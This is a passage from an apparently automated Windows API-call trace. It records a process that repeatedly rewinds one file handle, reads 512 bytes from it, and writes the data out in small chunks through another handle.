0x4c [0234.584] GetFileType (hFile=0x4c) returned 0x1 [0234.584] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.584] WriteFile (in: hFile=0x4c, lpBuffer=0x30f4b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f4b0*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.584] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.584] GetFileType (hFile=0x4c) returned 0x1 [0234.584] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.584] WriteFile (in: hFile=0x4c, lpBuffer=0x30f500*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f500*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.584] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.584] GetFileType (hFile=0x4c) returned 0x1 [0234.584] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.584] WriteFile (in: hFile=0x4c, lpBuffer=0x30f550*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f550*, lpNumberOfBytesWritten=0x30e554*=0x20, lpOverlapped=0x0) returned 1 [0234.584] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.584] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e540 | out: lpNewFilePointer=0x0) returned 1 [0234.584] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.584] ReadFile (in: hFile=0x54, lpBuffer=0x30f370, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e560, lpOverlapped=0x0 | out: lpBuffer=0x30f370*, lpNumberOfBytesRead=0x30e560*=0x200, lpOverlapped=0x0) returned 1 [0234.584] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.584] GetFileType (hFile=0x4c) returned 0x1 [0234.584] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.584] GetFileType (hFile=0x4c) returned 0x1 [0234.584] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.584] WriteFile (in: hFile=0x4c, lpBuffer=0x30f370*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f370*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.584] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.584] GetFileType (hFile=0x4c) returned 0x1 [0234.584] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.584] WriteFile (in: hFile=0x4c, lpBuffer=0x30f3c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f3c0*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.584] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.584] GetFileType (hFile=0x4c) returned 0x1 [0234.585] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.585] WriteFile (in: hFile=0x4c, lpBuffer=0x30f410*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f410*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.585] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.585] GetFileType (hFile=0x4c) returned 0x1 [0234.585] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.585] WriteFile (in: hFile=0x4c, lpBuffer=0x30f460*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f460*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.585] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.585] GetFileType (hFile=0x4c) returned 0x1 [0234.585] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.585] WriteFile (in: hFile=0x4c, lpBuffer=0x30f4b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f4b0*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.585] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.585] GetFileType (hFile=0x4c) returned 0x1 [0234.585] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.585] WriteFile (in: hFile=0x4c, lpBuffer=0x30f500*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f500*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.585] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.585] GetFileType (hFile=0x4c) returned 0x1 [0234.585] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.585] WriteFile (in: hFile=0x4c, lpBuffer=0x30f550*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f550*, lpNumberOfBytesWritten=0x30e554*=0x20, lpOverlapped=0x0) returned 1 [0234.585] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.585] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e540 | out: lpNewFilePointer=0x0) returned 1 [0234.585] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.585] ReadFile (in: hFile=0x54, lpBuffer=0x30f370, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e560, lpOverlapped=0x0 | out: lpBuffer=0x30f370*, lpNumberOfBytesRead=0x30e560*=0x200, lpOverlapped=0x0) returned 1 [0234.585] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.585] GetFileType (hFile=0x4c) returned 0x1 [0234.585] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.585] GetFileType (hFile=0x4c) returned 0x1 [0234.585] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.585] WriteFile (in: hFile=0x4c, lpBuffer=0x30f370*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f370*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.586] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.586] GetFileType (hFile=0x4c) returned 0x1 [0234.586] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.586] WriteFile (in: hFile=0x4c, lpBuffer=0x30f3c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f3c0*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.586] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.586] GetFileType (hFile=0x4c) returned 0x1 [0234.586] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.586] WriteFile (in: hFile=0x4c, lpBuffer=0x30f410*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f410*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.586] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.586] GetFileType (hFile=0x4c) returned 0x1 [0234.586] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.586] WriteFile (in: hFile=0x4c, lpBuffer=0x30f460*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f460*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.586] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.586] GetFileType (hFile=0x4c) returned 0x1 [0234.586] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.709] WriteFile (in: hFile=0x4c, lpBuffer=0x30f4b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f4b0*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.709] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.709] GetFileType (hFile=0x4c) returned 0x1 [0234.709] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.709] WriteFile (in: hFile=0x4c, lpBuffer=0x30f500*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f500*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.710] GetFileType (hFile=0x4c) returned 0x1 [0234.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.710] WriteFile (in: hFile=0x4c, lpBuffer=0x30f550*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f550*, lpNumberOfBytesWritten=0x30e554*=0x20, lpOverlapped=0x0) returned 1 [0234.710] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.710] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e540 | out: lpNewFilePointer=0x0) returned 1 [0234.710] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.710] ReadFile (in: hFile=0x54, lpBuffer=0x30f370, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e560, lpOverlapped=0x0 | out: lpBuffer=0x30f370*, lpNumberOfBytesRead=0x30e560*=0x200, lpOverlapped=0x0) returned 1 [0234.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.710] GetFileType (hFile=0x4c) returned 0x1 [0234.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.710] GetFileType (hFile=0x4c) returned 0x1 [0234.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.710] WriteFile (in: hFile=0x4c, lpBuffer=0x30f370*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f370*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.710] GetFileType (hFile=0x4c) returned 0x1 [0234.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.710] WriteFile (in: hFile=0x4c, lpBuffer=0x30f3c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f3c0*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.710] GetFileType (hFile=0x4c) returned 0x1 [0234.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.710] WriteFile (in: hFile=0x4c, lpBuffer=0x30f410*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f410*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.710] GetFileType (hFile=0x4c) returned 0x1 [0234.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.710] WriteFile (in: hFile=0x4c, lpBuffer=0x30f460*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f460*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.710] GetFileType (hFile=0x4c) returned 0x1 [0234.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.711] WriteFile (in: hFile=0x4c, lpBuffer=0x30f4b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f4b0*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.711] GetFileType (hFile=0x4c) returned 0x1 [0234.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.711] WriteFile (in: hFile=0x4c, lpBuffer=0x30f500*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f500*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.711] GetFileType (hFile=0x4c) returned 0x1 [0234.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.711] WriteFile (in: hFile=0x4c, lpBuffer=0x30f550*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f550*, lpNumberOfBytesWritten=0x30e554*=0x20, lpOverlapped=0x0) returned 1 [0234.711] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.711] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e540 | out: lpNewFilePointer=0x0) returned 1 [0234.711] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.711] ReadFile (in: hFile=0x54, lpBuffer=0x30f370, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e560, lpOverlapped=0x0 | out: lpBuffer=0x30f370*, lpNumberOfBytesRead=0x30e560*=0x200, lpOverlapped=0x0) returned 1 [0234.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.711] GetFileType (hFile=0x4c) returned 0x1 [0234.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.711] GetFileType (hFile=0x4c) returned 0x1 [0234.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.711] WriteFile (in: hFile=0x4c, lpBuffer=0x30f370*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f370*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.711] GetFileType (hFile=0x4c) returned 0x1 [0234.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.711] WriteFile (in: hFile=0x4c, lpBuffer=0x30f3c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f3c0*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.711] GetFileType (hFile=0x4c) returned 0x1 [0234.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.711] WriteFile (in: hFile=0x4c, lpBuffer=0x30f410*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f410*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.712] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.712] GetFileType (hFile=0x4c) returned 0x1 [0234.712] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.712] WriteFile (in: hFile=0x4c, lpBuffer=0x30f460*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f460*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.712] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.712] GetFileType (hFile=0x4c) returned 0x1 [0234.712] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.712] WriteFile (in: hFile=0x4c, lpBuffer=0x30f4b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f4b0*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.712] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.712] GetFileType (hFile=0x4c) returned 0x1 [0234.712] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.712] WriteFile (in: hFile=0x4c, lpBuffer=0x30f500*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f500*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.712] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.712] GetFileType (hFile=0x4c) returned 0x1 [0234.712] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.712] WriteFile (in: hFile=0x4c, lpBuffer=0x30f550*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f550*, lpNumberOfBytesWritten=0x30e554*=0x20, lpOverlapped=0x0) returned 1 [0234.712] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.712] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e540 | out: lpNewFilePointer=0x0) returned 1 [0234.712] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.712] ReadFile (in: hFile=0x54, lpBuffer=0x30f370, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e560, lpOverlapped=0x0 | out: lpBuffer=0x30f370*, lpNumberOfBytesRead=0x30e560*=0x200, lpOverlapped=0x0) returned 1 [0234.712] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.712] GetFileType (hFile=0x4c) returned 0x1 [0234.712] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.712] GetFileType (hFile=0x4c) returned 0x1 [0234.712] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.712] WriteFile (in: hFile=0x4c, lpBuffer=0x30f370*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f370*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.712] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.712] GetFileType (hFile=0x4c) returned 0x1 [0234.712] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.712] WriteFile (in: hFile=0x4c, lpBuffer=0x30f3c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f3c0*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.713] GetFileType (hFile=0x4c) returned 0x1 [0234.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.713] WriteFile (in: hFile=0x4c, lpBuffer=0x30f410*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f410*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.713] GetFileType (hFile=0x4c) returned 0x1 [0234.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.713] WriteFile (in: hFile=0x4c, lpBuffer=0x30f460*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f460*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.713] GetFileType (hFile=0x4c) returned 0x1 [0234.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.713] WriteFile (in: hFile=0x4c, lpBuffer=0x30f4b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f4b0*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.713] GetFileType (hFile=0x4c) returned 0x1 [0234.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.713] WriteFile (in: hFile=0x4c, lpBuffer=0x30f500*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f500*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.713] GetFileType (hFile=0x4c) returned 0x1 [0234.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.713] WriteFile (in: hFile=0x4c, lpBuffer=0x30f550*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f550*, lpNumberOfBytesWritten=0x30e554*=0x20, lpOverlapped=0x0) returned 1 [0234.713] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.713] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e540 | out: lpNewFilePointer=0x0) returned 1 [0234.713] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.713] ReadFile (in: hFile=0x54, lpBuffer=0x30f370, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e560, lpOverlapped=0x0 | out: lpBuffer=0x30f370*, lpNumberOfBytesRead=0x30e560*=0x200, lpOverlapped=0x0) returned 1 [0234.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.713] GetFileType (hFile=0x4c) returned 0x1 [0234.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.713] GetFileType (hFile=0x4c) returned 0x1 [0234.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.713] WriteFile (in: hFile=0x4c, lpBuffer=0x30f370*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f370*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.714] GetFileType (hFile=0x4c) returned 0x1 [0234.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.714] WriteFile (in: hFile=0x4c, lpBuffer=0x30f3c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f3c0*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.714] GetFileType (hFile=0x4c) returned 0x1 [0234.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.714] WriteFile (in: hFile=0x4c, lpBuffer=0x30f410*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f410*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.714] GetFileType (hFile=0x4c) returned 0x1 [0234.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.714] WriteFile (in: hFile=0x4c, lpBuffer=0x30f460*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f460*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.714] GetFileType (hFile=0x4c) returned 0x1 [0234.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.714] WriteFile (in: hFile=0x4c, lpBuffer=0x30f4b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f4b0*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.714] GetFileType (hFile=0x4c) returned 0x1 [0234.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.714] WriteFile (in: hFile=0x4c, lpBuffer=0x30f500*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f500*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.714] GetFileType (hFile=0x4c) returned 0x1 [0234.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.714] WriteFile (in: hFile=0x4c, lpBuffer=0x30f550*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f550*, lpNumberOfBytesWritten=0x30e554*=0x20, lpOverlapped=0x0) returned 1 [0234.714] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.714] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e540 | out: lpNewFilePointer=0x0) returned 1 [0234.714] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.714] ReadFile (in: hFile=0x54, lpBuffer=0x30f370, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e560, lpOverlapped=0x0 | out: lpBuffer=0x30f370*, lpNumberOfBytesRead=0x30e560*=0x200, lpOverlapped=0x0) returned 1 [0234.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.715] GetFileType (hFile=0x4c) returned 0x1 [0234.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.715] GetFileType (hFile=0x4c) returned 0x1 [0234.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.715] WriteFile (in: hFile=0x4c, lpBuffer=0x30f370*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f370*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.715] GetFileType (hFile=0x4c) returned 0x1 [0234.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.715] WriteFile (in: hFile=0x4c, lpBuffer=0x30f3c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f3c0*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.715] GetFileType (hFile=0x4c) returned 0x1 [0234.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.715] WriteFile (in: hFile=0x4c, lpBuffer=0x30f410*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f410*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.715] GetFileType (hFile=0x4c) returned 0x1 [0234.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.715] WriteFile (in: hFile=0x4c, lpBuffer=0x30f460*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f460*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.715] GetFileType (hFile=0x4c) returned 0x1 [0234.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.715] WriteFile (in: hFile=0x4c, lpBuffer=0x30f4b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f4b0*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.715] GetFileType (hFile=0x4c) returned 0x1 [0234.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.715] WriteFile (in: hFile=0x4c, lpBuffer=0x30f500*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f500*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.715] GetFileType (hFile=0x4c) returned 0x1 [0234.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.715] WriteFile (in: hFile=0x4c, lpBuffer=0x30f550*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f550*, lpNumberOfBytesWritten=0x30e554*=0x20, lpOverlapped=0x0) returned 1 [0234.716] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.716] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e540 | out: lpNewFilePointer=0x0) returned 1 [0234.716] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.716] ReadFile (in: hFile=0x54, lpBuffer=0x30f370, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e560, 